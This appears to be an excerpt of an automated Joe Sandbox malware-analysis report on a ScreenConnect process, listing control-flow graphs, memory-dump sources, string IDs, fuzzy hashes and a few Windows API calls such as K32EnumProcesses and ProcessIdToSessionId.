                                                                                                                                                                                control_flow_graph 205 39933c2-3993418 212 399341a-399342e 205->212 213 3993452-3993481 205->213 216 3993430 212->216 217 3993437-3993447 212->217 222 3993483-3993499 213->222 223 39934c4-39934eb call 39928e0 213->223 216->217 217->213 227 399349b 222->227 228 39934a2-39934c2 222->228 284 39934ee call 3993830 223->284 285 39934ee call 3993860 223->285 227->228 228->223 233 39934f0-3993501 234 399355c-399356b 233->234 235 3993503-399351d 233->235 236 399356d-3993581 234->236 237 39935b0-39935d7 234->237 244 399374e 235->244 245 3993523-399354b 235->245 241 399358a-39935ae 236->241 242 3993583 236->242 248 39935d9-399360f 237->248 249 3993612-3993636 237->249 241->237 242->241 251 3993753-3993764 244->251 286 399354d call 3995021 245->286 287 399354d call 3995030 245->287 248->249 255 3993638-399366f 249->255 256 3993671-399369b 249->256 255->256 288 399369d call 3995410 256->288 289 399369d call 3995403 256->289 266 3993553-399355a 266->234 266->235 268 39936a3-39936b7 271 3993739-399374c 268->271 272 39936bd-39936d7 268->272 271->251 272->244 275 39936d9-399370a 272->275 280 399370c-3993728 275->280 281 3993730-3993737 275->281 280->281 281->271 281->272 284->233 285->233 286->266 287->266 288->268 289->268
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ##$S!
                                                                                                                                                                                • API String ID: 0-4091637039
                                                                                                                                                                                • Opcode ID: ea195f8b23f8f38d79994a36498d5aba8b5ff086bf269039adecd82dc7b90987
                                                                                                                                                                                • Instruction ID: 3c65b87d34a65d3f641cdf3d760a29e6113c3b31d79f06fe517ce6f2bda61483
                                                                                                                                                                                • Opcode Fuzzy Hash: ea195f8b23f8f38d79994a36498d5aba8b5ff086bf269039adecd82dc7b90987
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AA1B235A002059FDB19EF6DD580A5EBBF6EF84340B19C9AAD4099B364DF35EC06CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 290 11def78-11def97 291 11def9d-11defa6 290->291 292 11df1c8-11df1ed 290->292 295 11defac-11df010 291->295 296 11df1f4-11df233 291->296 292->296 307 11df03a-11df043 295->307 308 11df012-11df037 295->308 309 11df048-11df05e call 11df630 307->309 310 11df045 307->310 308->307 313 11df064-11df066 309->313 310->309 314 11df068-11df06d 313->314 315 11df0c3-11df0d0 313->315 317 11df06f-11df0a4 314->317 318 11df0a9-11df0bc 314->318 320 11df0dd 315->320 321 11df0d2-11df0db 315->321 329 11df168-11df17c 317->329 318->315 324 11df0e2-11df0e4 320->324 321->324 325 11df119-11df161 324->325 326 11df0e6-11df112 324->326 325->329 326->325 333 11df17e 329->333 334 11df186-11df18b 329->334 333->334 337 11df18d 334->337 338 11df195-11df19a 334->338 337->338 340 11df19c-11df1aa call 11de9f4 call 11dea0c 338->340 341 11df1af 338->341 340->341 341->292
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (&]q$(aq
                                                                                                                                                                                • API String ID: 0-1602648543
                                                                                                                                                                                • Opcode ID: b40d25177ebd98b8314e82ed93029249601ea59d14340612e6ca2531826031b7
                                                                                                                                                                                • Instruction ID: 509ea46c7e0eb833106d741c94dfd4f3f3ae8a62ad9e5e44416a69b153c73221
                                                                                                                                                                                • Opcode Fuzzy Hash: b40d25177ebd98b8314e82ed93029249601ea59d14340612e6ca2531826031b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 64616031F0021A8BDB19EBB9C4506AEBAE2AFC5700F148569D506BB385DF34AE47C791

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 382 11d4c64-11d4cb3 387 11d4cb5-11d4cc4 call 11d4848 382->387 388 11d4d02-11d4d08 382->388 391 11d4d09-11d4dd8 387->391 392 11d4cc6-11d4ccb 387->392 398 11d4dda-11d4de0 391->398 399 11d4de1-11d4e24 391->399 405 11d4cce call 11d52f8 392->405 406 11d4cce call 11d52e8 392->406 393 11d4cd4 393->388 398->399 403 11d4e2b-11d4e32 399->403 404 11d4e26 399->404 404->403 405->393 406->393
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `Q]q$`Q]q
                                                                                                                                                                                • API String ID: 0-3952371890
                                                                                                                                                                                • Opcode ID: eb7ba1f797da69b48d50b35e9bace909ad2eccef723cd297b06e7ed2b2fd8459
                                                                                                                                                                                • Instruction ID: c526c10f4c26123a7efbc3399cbf97399c980fa46772825a643e338e1c9fd79f
                                                                                                                                                                                • Opcode Fuzzy Hash: eb7ba1f797da69b48d50b35e9bace909ad2eccef723cd297b06e7ed2b2fd8459
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41BD70A043299FDB64DF68C848BAEBBB5FB45300F0085E9D54CA7680DB785E48CF92

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 407 11d5410-11d541b 408 11d5421-11d5423 407->408 409 11d543b-11d543c 408->409 410 11d5425-11d542b 408->410 411 11d542d 410->411 412 11d542f-11d5431 410->412 411->409 412->409
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: 2a89a66cf99b0e8e8af21c1975d6452dd402027937bc7744c29e55df1ca3b06f
                                                                                                                                                                                • Instruction ID: 19fc2d69282087506163f75201dbdf9cd442c0d53b4403dc302c7811f845a763
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a89a66cf99b0e8e8af21c1975d6452dd402027937bc7744c29e55df1ca3b06f
                                                                                                                                                                                • Instruction Fuzzy Hash: 94D05E303802088FA76CCE6DD584A1133FABF44A013A104A5D9458B236EF30EC41C756

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 413 56e3768-56e377d 414 56e377f-56e3782 413->414 415 56e3792-56e3799 413->415 416 56e384c-56e3860 414->416 417 56e3788-56e3791 414->417 418 56e379e-56e37e2 call 56e294c 415->418 419 56e3826-56e382f 416->419 420 56e3862 416->420 437 56e37e7-56e37ec 418->437 422 56e388c-56e38ee 419->422 423 56e3831-56e384b 419->423 421 56e386e-56e3877 420->421 429 56e38fa-56e3930 K32EnumProcesses 422->429 430 56e38f0-56e38f8 422->430 431 56e3939-56e3961 429->431 432 56e3932-56e3938 429->432 430->429 432->431 438 56e3878-56e3885 437->438 439 56e37f2-56e37f5 437->439 438->422 440 56e37f7-56e3824 439->440 441 56e3864-56e3869 439->441 440->419 440->421 441->418
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 430cc1608f44437f0d69fa487099afdfd7b715fb5caf89c574aec3d7736200da
                                                                                                                                                                                • Instruction ID: 953b73595c6634178a152290dd8e606100b731d7cdb6256f0b9b4cd0c1e90c77
                                                                                                                                                                                • Opcode Fuzzy Hash: 430cc1608f44437f0d69fa487099afdfd7b715fb5caf89c574aec3d7736200da
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A518071A016058FCB24CF6AD884AAEBBF5FF88310F148A2ED45AD7750D734E905CBA1

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 446 11dfb40-11dfb69 447 11dfb70-11dfb87 call 11d7390 446->447 448 11dfb6b call 11d7390 446->448 451 11dfb89-11dfbb4 447->451 452 11dfbba-11dfbbe 447->452 448->447 451->452 453 11dfbf1-11dfbf5 452->453 454 11dfbc0-11dfbeb 452->454 455 11dfc0b-11dfc0f 453->455 456 11dfbf7-11dfc05 453->456 454->453 459 11dfc3b-11dfccd 455->459 460 11dfc11-11dfc35 455->460 456->455 465 11dfccf-11dfcfc 459->465 466 11dfd02-11dfd06 459->466 460->459 465->466 468 11dfd08-11dfd1c 466->468 469 11dfd22-11dfd26 466->469 468->469 470 11dfd28-11dfd3c 469->470 471 11dfd42-11dfd46 469->471 470->471 473 11dfd48-11dfd5c 471->473 474 11dfd62-11dfd66 471->474 473->474 477 11dfd7c-11dfd80 474->477 478 11dfd68-11dfd76 474->478 480 11dfd96-11dfd9a 477->480 481 11dfd82-11dfd90 477->481 478->477 482 11dfd9c-11dfdaa 480->482 483 11dfdb0-11dfdb4 480->483 481->480 482->483 484 11dfdca-11dfdce 483->484 485 11dfdb6-11dfdc4 483->485 486 11dfe01-11dfe05 484->486 487 11dfdd0-11dfdfb 484->487 485->484 488 11dfe07-11dfe15 486->488 489 11dfe51-11dfe58 486->489 487->486 488->489 491 11dfe17 488->491 492 11dfe1a-11dfe1f 491->492 493 11dfe59-11dfed9 call 11d74f8 492->493 494 11dfe21-11dfe32 492->494 508 11dff1c-11dff1d 493->508 509 11dfedb-11dfef1 493->509 496 11dfe3d-11dfe4f 494->496 497 11dfe34-11dfe37 494->497 496->489 496->492 497->496 511 11dff28-11dff2d 508->511 512 11dfefa-11dff1a 509->512 513 11dfef3 509->513 512->508 513->512
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: d
                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                • Opcode ID: dbe8df8de5d717913a81686664cb911a94bb26eded775191e42b67ea77a75ab8
                                                                                                                                                                                • Instruction ID: 9568f4a858de5eaa7619230978454dc03fcfdabb99a8e4420f7f2bd860ba3119
                                                                                                                                                                                • Opcode Fuzzy Hash: dbe8df8de5d717913a81686664cb911a94bb26eded775191e42b67ea77a75ab8
                                                                                                                                                                                • Instruction Fuzzy Hash: 19D16F34A00715CFCB08DF68C988A99B7F5FF49310B118699E919AB365DB70ED86CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 516 56e294c-56e38ee 518 56e38fa-56e3930 K32EnumProcesses 516->518 519 56e38f0-56e38f8 516->519 520 56e3939-56e3961 518->520 521 56e3932-56e3938 518->521 519->518 521->520
                                                                                                                                                                                APIs
                                                                                                                                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 056E391D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumProcesses
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 84517404-0
                                                                                                                                                                                • Opcode ID: 42e7a483249dea0b3e217097439fabb69d862e11bb8d1f587e0b388df566f66a
                                                                                                                                                                                • Instruction ID: 5f06e77fdafcf65506f15580f22a8ded75fc3fa82a00557492ce2da280e44181
                                                                                                                                                                                • Opcode Fuzzy Hash: 42e7a483249dea0b3e217097439fabb69d862e11bb8d1f587e0b388df566f66a
                                                                                                                                                                                • Instruction Fuzzy Hash: C52112B19012099FDB10CF9AC885AEEBBF4FB48320F10842EE519A7340D339A945CBA4

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 524 56e2940-56e3a11 ProcessIdToSessionId 526 56e3a1a-56e3a42 524->526 527 56e3a13-56e3a19 524->527 527->526
                                                                                                                                                                                APIs
                                                                                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056E39FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessSession
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3779259828-0
                                                                                                                                                                                • Opcode ID: 9753a46f341d39594c70dfbf9b73e6a20e3307c2e996e9c9cfb7555387170103
                                                                                                                                                                                • Instruction ID: 519a51819abdef41894b65ff58ebef5adb29cf5aae807bba612b51a3d44c3313
                                                                                                                                                                                • Opcode Fuzzy Hash: 9753a46f341d39594c70dfbf9b73e6a20e3307c2e996e9c9cfb7555387170103
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E1100B1C002498FCB20DF9AC444BEEBBF4FB48320F10846AD459A7340D779A945CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 530 56e3999-56e399b 531 56e39a0-56e3a11 ProcessIdToSessionId 530->531 532 56e3a1a-56e3a42 531->532 533 56e3a13-56e3a19 531->533 533->532
                                                                                                                                                                                APIs
                                                                                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056E39FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessSession
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3779259828-0
                                                                                                                                                                                • Opcode ID: ef095a224a3ffb0362a95daf1cbe361d88a8a1d0adfc88106e14d673a2d7ea79
                                                                                                                                                                                • Instruction ID: 2360b1f3e9b864c1f98a7ea7cb54adb7292d31128815ae2006a75396c11e0c24
                                                                                                                                                                                • Opcode Fuzzy Hash: ef095a224a3ffb0362a95daf1cbe361d88a8a1d0adfc88106e14d673a2d7ea79
                                                                                                                                                                                • Instruction Fuzzy Hash: 181100B1C002498FCB20CF9AC885BEEBBF4FB48320F14842AD459A3240D778A545CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 536 3992100-3992101 537 399209d-39920d4 536->537 538 3992103-3992138 536->538 537->536 542 399213a 538->542 543 399213d-399216d 538->543 542->543 548 399217d 543->548 549 399216f-399217b 543->549 550 399217f-399218f 548->550 549->550 553 3992212-3992220 550->553 554 3992195-39921a4 550->554 557 3992230 553->557 558 3992222-399222e 553->558 559 39921b4 554->559 560 39921a6-39921b2 554->560 561 3992232-3992242 557->561 558->561 562 39921b6-39921c1 559->562 560->562 569 3992248-399225d 561->569 570 39922cb-39922e3 561->570 567 39921cb-39921e9 562->567 568 39921c3 562->568 576 39921f9 567->576 577 39921eb-39921f7 567->577 568->567 578 399226d 569->578 579 399225f-399226b 569->579 574 3992310-3992336 570->574 575 39922e5-399230d 570->575 588 3992338-3992344 574->588 589 3992346 574->589 575->574 580 39921fb-399220f 576->580 577->580 581 399226f-399227a 578->581 579->581 580->553 591 399227c 581->591 592 3992284-39922a2 581->592 590 3992349-3992358 588->590 589->590 599 3992368 590->599 600 399235a-3992366 590->600 591->592 601 39922b2 592->601 602 39922a4-39922b0 592->602 603 399236a-3992378 599->603 600->603 605 39922b4-39922c8 601->605 602->605 608 3992388 603->608 609 399237a-3992386 603->609 605->570 611 399238a-399238c 608->611 609->611 615 399238e call 39928c0 611->615 616 399238e call 39928e0 611->616 614 3992394-399239b 615->614 616->614
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: C$z
                                                                                                                                                                                • API String ID: 0-414927723
                                                                                                                                                                                • Opcode ID: de1e138e621f648a1d3a97e12c9ce9c9ba433db7eb21d66b97cf6a2928ddbc7c
                                                                                                                                                                                • Instruction ID: e414b310e187945e40ebf96c2e1d40e9a2dd62031a3f63303b643bb27ec77fcd
                                                                                                                                                                                • Opcode Fuzzy Hash: de1e138e621f648a1d3a97e12c9ce9c9ba433db7eb21d66b97cf6a2928ddbc7c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3971A330B0060A9BDF18DBACC45156EF7EAEFC8250B28896BD0469B398DB70DC068791

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 617 11d8d98-11d8db8 618 11d8dba-11d8ddb 617->618 619 11d8de2-11d8df1 617->619 618->619 620 11d8dfd-11d8e0a 619->620 621 11d8df3 619->621 625 11d8ede-11d8ef2 620->625 626 11d8e10-11d8e1f 620->626 621->620 629 11d8efe-11d8f21 625->629 630 11d8ef4 625->630 627 11d8e2b-11d8e37 626->627 628 11d8e21 626->628 634 11d8e39-11d8e48 627->634 635 11d8e70-11d8e7f 627->635 628->627 641 11d8f2d-11d8f37 629->641 642 11d8f23 629->642 630->629 637 11d8e4a 634->637 638 11d8e54-11d8e6f 634->638 639 11d8e8b-11d8eb2 635->639 640 11d8e81 635->640 637->638 648 11d8ebe-11d8edd 639->648 649 11d8eb4 639->649 640->639 662 11d8f3a call 11d9098 641->662 663 11d8f3a call 11d90a8 641->663 642->641 649->648 650 11d8f40-11d8f42 651 11d8f88-11d8fa1 650->651 652 11d8f44-11d8f53 650->652 657 11d8fac 651->657 658 11d8fa3 651->658 655 11d8f5f-11d8f86 652->655 656 11d8f55 652->656 655->651 655->652 656->655 658->657 662->650 663->650
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                • Opcode ID: 45ad0085ee73e0f2881e11fb72117986370a46ef1661956685e55150f73c7275
                                                                                                                                                                                • Instruction ID: d5585c69f31d9d552226606d27b75f66d49c6fa45067e7c91401bc6de4094fe5
                                                                                                                                                                                • Opcode Fuzzy Hash: 45ad0085ee73e0f2881e11fb72117986370a46ef1661956685e55150f73c7275
                                                                                                                                                                                • Instruction Fuzzy Hash: BF61F534B106199FDB08DF68D994A6EB7F2FF89714B1080A9E506DB365DB30EC02CB81
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 0c836ccbd012d8190fbeb539f5e5f2d33c2cf439d2b30440281fa317e68640d8
                                                                                                                                                                                • Instruction ID: b003329cc7a19e2289acedf638c4035fc56cce346782a6dc24813dcde7ddbf0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c836ccbd012d8190fbeb539f5e5f2d33c2cf439d2b30440281fa317e68640d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 8751B0B5A002168FEF14DB59C58066EB7B6FF85304F28C4A7D425DB365EB30D942CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                • Opcode ID: acf44e89db2d1deeed7a596f62fc48d3c6ff850852ad584ba781250261c9f868
                                                                                                                                                                                • Instruction ID: d5483e0e493694f168ed6b77103c64c3430b81de81ad979306b614360dd5bf13
                                                                                                                                                                                • Opcode Fuzzy Hash: acf44e89db2d1deeed7a596f62fc48d3c6ff850852ad584ba781250261c9f868
                                                                                                                                                                                • Instruction Fuzzy Hash: 5951A0307002058FCB58EB79D995A6E77F7EF88604B208469D506DB365EF71EC05CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q
                                                                                                                                                                                • API String ID: 0-1007455737
                                                                                                                                                                                • Opcode ID: 929a7804c5600a8ef5bb93caee9a3d4797463950d7d3c4e6be72a34037776db9
                                                                                                                                                                                • Instruction ID: 7fbfbe9db701f99c6e622a7e78915a09153c666e25b2c7ec89d753d4c6006a1a
                                                                                                                                                                                • Opcode Fuzzy Hash: 929a7804c5600a8ef5bb93caee9a3d4797463950d7d3c4e6be72a34037776db9
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E517030A00719CFDB19EFA8C494B6DBBB2FF44300F11895DD40A6B265EB74E985CB81
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                • Opcode ID: 3a325c8cd9a94a05ab11aa2b7d4c7d8d3ffd36914ab191358c8b5030b33e7c64
                                                                                                                                                                                • Instruction ID: 44856bffa09fe93f3b18ca55dcf737571649a9250394d42654d925fc6a0da644
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a325c8cd9a94a05ab11aa2b7d4c7d8d3ffd36914ab191358c8b5030b33e7c64
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51A1307002068FC758EB38D995A6E7BF3AF88604B148479D506DB3A5EF75ED06CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq
                                                                                                                                                                                • API String ID: 0-4247494828
                                                                                                                                                                                • Opcode ID: 16228432442df7ae09d42c3075e5847fda2afc815f357767efbd51cf3f474afc
                                                                                                                                                                                • Instruction ID: 85a9cd576e1a450363dc4ff850a15cb68e57bacccb0333e6a47a319aacf0fd64
                                                                                                                                                                                • Opcode Fuzzy Hash: 16228432442df7ae09d42c3075e5847fda2afc815f357767efbd51cf3f474afc
                                                                                                                                                                                • Instruction Fuzzy Hash: C441A1307002068FC759EB78D994B6E7BF3AF88604B248469D506CB366EF74DC45CB81
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                • Opcode ID: 6cdcf380cf5ce9ea24b4578036e8b722d55cd181fd18104380874237468bd7f1
                                                                                                                                                                                • Instruction ID: 7d785dbac353349ef1b0d976026d7654af3a97d70fd4bc52c77f9c56115ac678
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cdcf380cf5ce9ea24b4578036e8b722d55cd181fd18104380874237468bd7f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0241F431A00105CBCB19EF68E890B6DBFB6EF84715B14C565D9169B396DF30EC06CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 0-1334834377
                                                                                                                                                                                • Opcode ID: 11fd41522fd398b75229bdd3f2f6885b995259c161666e62da72160d4301aabb
                                                                                                                                                                                • Instruction ID: 23e5ac64a4034de57da05d9d02df00befb862124fc1ad868c22356c2c44ef3a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 11fd41522fd398b75229bdd3f2f6885b995259c161666e62da72160d4301aabb
                                                                                                                                                                                • Instruction Fuzzy Hash: 4131CE31B402154F8719EB7CA990D6E7BEAEFC9650304856AD809DB389EF70ED09CBD1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 0-1334834377
                                                                                                                                                                                • Opcode ID: 8ca4cb5b9fc8f7da3079f60f2afeabe571a799560e1287f34c33a2fa15af9635
                                                                                                                                                                                • Instruction ID: 79bdad736245385ce2a175eb8c798de1e11575e4d330ea6643fda543e62c9279
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ca4cb5b9fc8f7da3079f60f2afeabe571a799560e1287f34c33a2fa15af9635
                                                                                                                                                                                • Instruction Fuzzy Hash: 7731F231B403154B8709EB7DA990D6E7BEAEFC8650300856AD909DB349EF70DD09CBD0
